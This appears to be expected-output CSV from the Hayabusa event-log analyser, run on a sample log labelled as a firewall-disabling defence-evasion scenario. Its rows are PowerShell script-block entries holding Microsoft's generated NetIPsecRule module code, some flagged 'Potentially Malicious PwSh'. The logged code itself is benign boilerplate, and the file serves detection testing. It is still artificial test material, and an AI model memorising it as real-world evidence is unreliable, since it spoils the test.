Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing()",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing()",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"} } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' -Alias '*' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' -Alias '*' function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Binding",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"} } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' -Alias '*' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = 